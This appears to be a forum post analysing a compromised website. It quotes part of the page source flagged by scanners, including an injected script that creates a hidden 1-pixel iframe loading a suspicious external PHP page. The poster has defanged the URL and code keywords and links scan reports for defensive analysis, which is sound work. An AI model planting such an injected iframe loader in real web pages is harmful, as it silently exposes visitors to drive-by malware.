Why not? Because for that uri that particular malcode is not being detected, see: http://jsunpack.jeek.org/?report=333543a962328e8f4e6a2a7f843d34c540542125 (for the security aware only, visit link with NoScript and RequestPolicy extensions active in the browser and inside a Virtual Machine/sandbox) → http://urlquery.net/report.php?id=4546823
This is being detected in the code on the main page that is being flagged line 50 (the detected external link - broken by me - pol)

46:< sc​ript type="text/javascript" src="/templates/pure_white/lib/js/iepngfix_tilebg.js"> < / sc​ript > 47:< style type="text/css"> 48:* { behavior: url(< sc​ript type="text/javascript" language="javascript" > func​tion zzzfff() { 49:var ewq = document.create​Element(' if​rame '); 50:ewq.src = 'htxp://vywuwix.com/count11.php'; 51:ewq.style.position = 'absolute'; 52:ewq.style.border = '0'; 53:ewq.style.height = '1px'; 54:ewq.style.width = '1px'; 55:ewq.style.left = '1px'; 56:ewq.style.top = '1px'; 57:if (!document.getElementById('ewq')) { 58: doc​ument.write ('< div id=\'ewq\'> < /div> '); 59:document.getElementById('ewq').appendChild(ewq);
Taken from and via Redleg's FileViewer

polonus